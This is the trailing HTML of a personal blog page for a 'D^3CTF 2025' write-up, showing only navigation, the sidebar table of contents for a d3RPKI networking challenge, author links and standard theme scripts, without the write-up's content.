          <img data-src="/images/posts/2025-lfx-mentorship/lfx-cncf-antrea.png" data-sizes="auto" alt="My LFX Mentorship Experience with CNCF Antrea" class="lazyload">
        
        <a href="/2025/09/05/My-LFX-Mentorship-Experience-with-CNCF-Antrea/"></a>
        <div class="article-nav-caption">Newer</div>
        <h3 class="article-nav-title">
          
            My LFX Mentorship Experience with CNCF Antrea
          
        </h3>
      </div>
    
    
    <div class="article-nav-link-wrap article-nav-link-right">
      
        <img data-src="/images/posts/2025-voip/voip.png" data-sizes="auto" alt="VoIP Setup for Beginners: Daily Use, CTF Challenges, and Wireshark Deep Dive" class="lazyload">
      
      <a href="/2025/05/28/VoIP-Setup-for-Beginners-Daily-Use-CTF-Challenges-and-Wireshark-Deep-Dive/"></a>
      <div class="article-nav-caption">Older</div>
      <h3 class="article-nav-title">
        
          VoIP Setup for Beginners: Daily Use, CTF Challenges, and Wireshark Deep Dive
        
      </h3>
    </div>
    
  </nav>


</article>






</section>
        </div>
        
        
        <footer id="footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    
    <div>
      <span class="icon-copyright"></span>
      2024-2025
      <span class="footer-info-sep rotate"></span>
      Harsh
    </div>
    
    
      <div>
        <span class="icon-brush"></span>
        29k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        02:57
      </div>
    
    
    
    
  </div>
</footer>

        
          <div class="sidebar-top">
            <div class="sidebar-top-taichi rotate"></div>
            <div class="arrow-up"></div>
          </div>
        
        <div id="mask" class="hide"></div>
      </div>
      <nav id="mobile-nav">
  <div class="sidebar-wrap">
    
      <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">Contents</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Misc-Networking"><span class="toc-number">1.</span> <span class="toc-text">Misc-Networking</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#d3RPKI"><span class="toc-number">1.1.</span> <span class="toc-text">d3RPKI</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Challenge-Description"><span class="toc-number">1.1.1.</span> <span class="toc-text">Challenge Description</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Solution"><span class="toc-number">1.1.2.</span> <span class="toc-text">Solution</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Flag"><span class="toc-number">1.1.3.</span> <span class="toc-text">Flag</span></a></li></ol></li></ol></li></ol>
      
  </div>
</div>
</div>
      <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/saturo-running-v1-6-2.gif" data-sizes="auto" alt="Harsh" class="lazyload">
  <div class="sidebar-author-name">Harsh</div>
  <div class="sidebar-description">21 | Dev &amp; CTF Player | IN</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>Posts</div>
    <div class="sidebar-state-number">10</div>
  </div>
  <div class="sidebar-state-category">
    <div>Categories</div>
    <div class="sidebar-state-number">2</div>
  </div>
  <div class="sidebar-state-tag">
    <div>Tags</div>
    <div class="sidebar-state-number">19</div>
  </div>
</div>
<div class="sidebar-social">
  
    <div class="icon-email sidebar-social-icon">
      <a href=mailto:notsoharsh13@gmail.com itemprop="url" target="_blank" aria-label="email" rel="noopener external nofollow noreferrer"></a>
    </div>
  
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/harshgdev itemprop="url" target="_blank" aria-label="github" rel="noopener external nofollow noreferrer"></a>
    </div>
  
    <div class="icon-twitter sidebar-social-icon">
      <a href=https://x.com/harshgdev itemprop="url" target="_blank" aria-label="twitter" rel="noopener external nofollow noreferrer"></a>
    </div>
  
    <div class="icon-linkedin sidebar-social-icon">
      <a href=https://www.linkedin.com/in/harsh-gupta-b5792a280 itemprop="url" target="_blank" aria-label="linkedin" rel="noopener external nofollow noreferrer"></a>
    </div>
  
    <div class="icon-discord sidebar-social-icon">
      <a href=https://discordapp.com/users/509689286589939713 itemprop="url" target="_blank" aria-label="discord" rel="noopener external nofollow noreferrer"></a>
    </div>
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="Home"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">Home</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="Archives"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">Archives</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="About"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">About</div>
      </div>
    
  
</div>
</div>
    
  </div>
  
    <div class="sidebar-btn-wrapper">
      <div class="sidebar-toc-btn current"></div>
      <div class="sidebar-common-btn"></div>
    </div>
  
</nav>

    </div>
    
      <div class="site-search">
        <div class="reimu-popup popup">
          <div class="reimu-search">
            <div class="reimu-search-input-icon"></div>
            <div class="reimu-search-input" id="reimu-search-input"></div>
            <div class="popup-btn-close"></div>
          </div>
          <div class="reimu-results">
            <div id="reimu-stats"></div>
            <div id="reimu-hits"></div>
            <div id="reimu-pagination" class="reimu-pagination"></div>
          </div>
          <img class="reimu-bg" src="/images/Satoru-Gojo-White-Hair-BlindfoldSatoru-Gojo.png"/>
        </div>
      </div>
    
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js" integrity="sha384-3gT&#x2F;vsepWkfz&#x2F;ff7PpWNUeMzeWoH3cDhm&#x2F;A8jM7ouoAK0&#x2F;fP&#x2F;9bcHHR5kHq2nf+e" crossorigin="anonymous"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js" integrity="sha384-J08i8An&#x2F;QeARD9ExYpvphB8BsyOj3Gh2TSh1aLINKO3L0cMSH2dN3E22zFoXEi0Q" crossorigin="anonymous"></script>



<script src="/js/script.js"></script>



  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>



<script src="/js/pjax_script.js" data-pjax></script>



  
<script src="/js/generator_search.js" defer></script>















<div id="lazy-script">
  <div>
    
      
      
      <script data-pjax>
        window.REIMU_POST = {
          author: "Harsh",
          title: "D^3CTF 2025",
          url: "https://harshgdev.github.io/2025/06/03/D^3CTF-2025/",
          excerpt: "",
          description: "",
          stripContent: "D^3CTF 2025!Organized by @Vidar, @CNSS, @L-Team, the 6th D^3CTF. D^3 means “the cube of Dian”, i.e., the cube of “electronic” in Chinese. As the three teams co-hosting this CTF game come from three “University of Electronic” in China (UESTC, Xidian, ",
          date: "Tue Jun 03 2025 17:08:16 GMT+0530",
          updated: "Tue Jun 03 2025 19:00:35 GMT+0530",
          cover: "/images/posts/2025-d%5E3ctf/cover.png",
        };
      </script>
       
    
    
      
        
<script src="/js/insert_highlight.js" data-pjax></script>

        
      
    
    
      <script type="module" data-pjax>
        const PhotoSwipeLightbox = (await safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js", "sha384-DiL6M/gG+wmTxmCRZyD1zee6lIhawn5TGvED0FOh7fXcN9B0aZ9dexSF/N6lrZi/")).default;
        
        const pswp = () => {
          if (_$$('.article-entry a.article-gallery-item').length > 0) {
            new PhotoSwipeLightbox({
              gallery: '.article-entry',
              children: 'a.article-gallery-item',
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
          if(_$$('.article-gallery a.article-gallery-item').length > 0) {
            new PhotoSwipeLightbox({
              gallery: '.article-gallery',
              children: 'a.article-gallery-item',
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
          window.lightboxStatus = 'done';
          window.removeEventListener('lightbox:ready', pswp);
        }
        if(window.lightboxStatus === 'ready') {
          pswp()
        } else {
          window.addEventListener('lightbox:ready', pswp);
        }
      </script>
      








    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '1.3.0' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  





<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>



  
    
<script src="https://npm.webcache.cn/katex@0.16.11/dist/katex.min.js" integrity="sha384-7zkQWkzuo3B5mTepMUcHkMB5jZaolc2xDwL6VFqjFALcbeS9Ggm&#x2F;Yr2r3Dy4lfFg" crossorigin="anonymous" defer data-pjax></script>

    
<script src="https://npm.webcache.cn/katex@0.16.11/dist/contrib/auto-render.min.js" integrity="sha384-43gviWU0YVjaDtb&#x2F;GhzOouOXtZMP&#x2F;7XUzwPTstBeZFe&#x2F;+rCMvRwr4yROQP43s0Xk" crossorigin="anonymous" defer onload="renderMathInElement(document.body, {delimiters: [{left: &#39;$$&#39;, right: &#39;$$&#39;, display: true},{left: &#39;$&#39;, right: &#39;$&#39;, display: false}]});" data-pjax></script>

  





  </body>
  </html>

